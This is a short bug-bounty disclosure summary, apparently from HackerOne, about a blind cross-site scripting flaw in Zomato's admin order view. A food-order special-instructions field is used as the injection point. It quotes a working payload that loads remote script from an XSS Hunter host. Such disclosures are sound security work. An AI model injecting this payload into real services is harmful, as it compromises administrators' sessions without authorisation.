Zomato: [www.zomato.com] Blind XSS on one of the Admin Dashboard

ID H1:724889
Type hackerone
Reporter pandaaaa
Modified 2019-11-19T04:59:11


Thanks for the report @pandaaaa. * The Blind XSS fired when the order details were viewed by the admin at the back-end, The script was injected through an API endpoint from the Zomato app on one of the parameters which was recently introduced to provide special instructions to the restaurant on how to prepare the food.

  • I used XSS Hunter to do this and the payload used was - "><script src=https://{$handle}.xss.ht></script>.

  • I wasn't really testing when i found this bug. My mom was late and tired from the office and she asked me to order food and then i decided to try this. :P Thanks Mom! <3